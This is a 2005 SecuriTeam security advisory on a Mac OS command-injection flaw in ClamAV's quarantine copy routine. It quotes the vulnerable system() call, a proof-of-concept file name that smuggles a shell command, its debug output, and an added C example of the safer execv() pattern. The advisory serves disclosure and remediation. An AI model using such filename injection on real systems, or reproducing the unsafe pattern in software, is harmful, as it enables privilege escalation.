[NEWS] ClamAV Local Privilege Escalation (MacOS)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/05

    To: list@securiteam.com
    Date: 31 May 2005 19:06:08 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      ClamAV Local Privilege Escalation (MacOS)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.clamav.net/abstract.html> Clam AntiVirus is a GPL anti-virus
    toolkit for UNIX. The main purpose of this software is the integration
    with mail servers (attachment scanning). The package provides a flexible
    and scalable multi-threaded daemon, a command line scanner, and a tool for
    automatic updating via Internet. The programs are based on a shared
    library distributed with the Clam AntiVirus package, which you can use
    with your own software."

    A vulnerability was discovered in ClamAV. Exploiting it allows a local
    attacker on a MacOS system to elevate privileges to those of the user
    running the ClamAV process.

    DETAILS

    Vulnerable Systems:
     * ClamAV versions 0.80rc4 through 0.84rc2

    Immune Systems:
     * ClamAV versions 0.84 and newer

    Under the Mac OS file system (HFS) a file is stored in two parts, a data
    fork and a resource fork. In ClamAV version 0.80rc4, support was added to
    copy both the data and the resource fork when moving a virus-infected
    file. The mechanism used was the Mac system utility ditto. While there
    isn't a security issue with the "ditto" command itself, the system() call
    used to execute it is insecure.

    From the function filecopy(), in the file shared/misc.c:
    ..
    #ifdef C_DARWIN
        /* On Mac OS X use ditto and copy resource fork, too. */
        char *ditto = (char *) mcalloc(strlen(src) + strlen(dest) + 30,\
                                       sizeof(char));
        sprintf(ditto, "/usr/bin/ditto --rsrc %s %s", src, dest);

        if(system(ditto)) {
            free(ditto);
            return -1;
        }
    ..

    This code does not check the filename for shell special characters, nor
    does it quote existing ones. If a file name contains an embedded shell
    command, system() will execute it with the UID of the ClamAV process.

    Example attack:
    Download the EICAR test file from http://www.eicar.org/download/eicar.com

    And rename it like so:
    $ mv eicar.com \;echo\ \"test\"\;

    If the clam user does not have permission to remove the file, it will try
    to copy the file and its resource fork via the ditto system() call. The
    command it will execute in this case is:
    system("/usr/bin/ditto -rsrc ;echo "test"; /tmp/;echo "test" ");

    The shell will interpret the ';echo "test";' as a separate command and
    execute it. The following is some sample output:
    $ sudo -u nobody clamscan . --debug --move=/tmp
    ..
    LibClamAV debug: Eicar-Test-Signature found in descriptor 6.
    /;echo "test";: Eicar-Test-Signature FOUND
    usage: ditto [ <options> ] src [ ... src ] dst
        <options> are any of:
        -v print a line of status for each src copied
        -V print a line of status for every file copied
        -X do not descend into directories with a different
                        device ID
        -c create a CPIO archive at dst
        -x unpack the CPIO archives at src...
        -z CPIO archives are compressed
        -k archives are PKZip format
        --keepParent parent directory of src is embedded in dst

        --arch archVal fat files will be thinned to specified archVal
                        multiple -arch options can be specified
                        archVal should be one of "ppc", "i386", etc
        --bom bomFile only files present in the specified bom are copied
        --rsrc copy preserving resource data
        --sequesterRsrc copy resources via polite directory (PKZip only)
    test
    ..

    The usage statement above is produced because in this case, ditto's call
    doesn't have the correct command line options. Afterward, "test" is
    printed, as expected.
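    As an added example (not ClamAV's code, and not the change the project shipped in 0.84), the C below contrasts the quoted filecopy() pattern, formatting a command line and handing it to system(), with passing the file names to the copying program as argv entries through fork()/execv() so that no shell ever parses them. It uses /bin/sh as a stand-in for /usr/bin/ditto so the difference can be observed on any Unix; run_argv(), args_seen_via_system(), args_seen_via_execv() and filecopy_ditto() are hypothetical names.

```c
/* Added example, not ClamAV code. The quoted filecopy() lets the shell parse
 * the file names; the fix pattern is to hand them to the program as argv
 * entries. /bin/sh stands in for ditto so the effect is visible anywhere. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Exit status of the program at path, started with argv; -1 on failure. */
static int run_argv(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(path, argv);
        _exit(127);                 /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* Vulnerable pattern (mirrors filecopy): format, then system(). The probe
 * `sh -c 'exit $#'` returns how many words the shell made of `name`. */
int args_seen_via_system(const char *name)
{
    size_t n = strlen(name) + 40;
    char *cmd = malloc(n);
    if (!cmd) return -1;
    snprintf(cmd, n, "/bin/sh -c 'exit $#' sh %s", name);
    int rc = system(cmd);
    free(cmd);
    return WIFEXITED(rc) ? WEXITSTATUS(rc) : -1;
}

/* Hardened pattern: same probe, but `name` travels as exactly one argument. */
int args_seen_via_execv(const char *name)
{
    char *const argv[] = { "sh", "-c", "exit $#", "sh", (char *)name, NULL };
    return run_argv("/bin/sh", argv);
}

/* Hardened equivalent of the quoted ditto branch (macOS only). */
int filecopy_ditto(const char *src, const char *dest)
{
    char *const argv[] = { "ditto", "--rsrc", (char *)src, (char *)dest, NULL };
    return run_argv("/usr/bin/ditto", argv) == 0 ? 0 : -1;
}
```

    With the name from the advisory, the system() path reports 0 words (the name was split into separate commands and the echo ran), while the execv() path reports 1.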

    The conditions under which this can be exploited are very limited. A
    ClamAV process must be configured to move files to a quarantine in order
    for the ditto call to be used. In addition, this call only appears to be
    used if a file move operation fails, at which point the file is then
    copied. Once again, due to the #define used in the affected function, only
    Mac OS installations are affected.

    Disclosure Timeline:
    31.03.05 - Initial Discovery
    03.04.05 - ClamAV Team Notified
    29.04.05 - Version 0.84 Released
    27.05.05 - Public Disclosure

    ADDITIONAL INFORMATION

    The information has been provided by Tim <mailto:tim-security@sentinelchicken.org>.
    The original article can be found at:
    http://www.sentinelchicken.com/advisories/clamav/
